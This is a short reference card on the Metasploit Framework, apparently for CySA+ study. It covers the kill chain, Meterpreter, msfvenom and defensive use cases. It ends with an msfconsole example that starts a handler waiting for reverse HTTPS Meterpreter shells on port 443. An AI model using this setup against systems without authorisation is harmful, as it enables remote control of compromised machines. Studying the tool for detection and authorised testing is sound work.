Metasploit Framework

Rapid7

The most widely used penetration testing and exploitation framework.

Vulnerability Management Freemium Platform / Suite Learning Cross-platform

Cyber Kill Chain & Defender Lifecycle

Attacker — Kill Chain

1 Reconnaissance

2 Weaponization

3 Delivery

4 Exploitation

5 Installation

6 Command & Control

7 Actions on Objectives

Defender — IR Lifecycle

8 Detection / Monitoring

9 Containment & Eradication

10 Post-incident Forensics

Description

Metasploit Framework is the leading open-source exploitation framework. Even though most CySA+ tasks are defensive, candidates must understand Metasploit because it is the canonical tool attackers use, and its modules drive a large share of detection signatures.

Core concepts:

Exploits vs payloads vs encoders vs auxiliaries vs post modules.
Meterpreter — the post-exploitation in-memory agent.
msfvenom — payload generator (PE, ELF, JSP, ASPX, raw shellcode).
db_nmap — automatic ingestion of Nmap results into the workspace.
Pivoting and routing through compromised hosts.

Use cases

Validating that a discovered vulnerability is actually exploitable
Generating IOC-rich payloads for purple-team detection engineering
Recognising Meterpreter staging traffic in PCAP analysis
Authorised internal red-team exercises

Example

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.14.5
set LPORT 443
run -j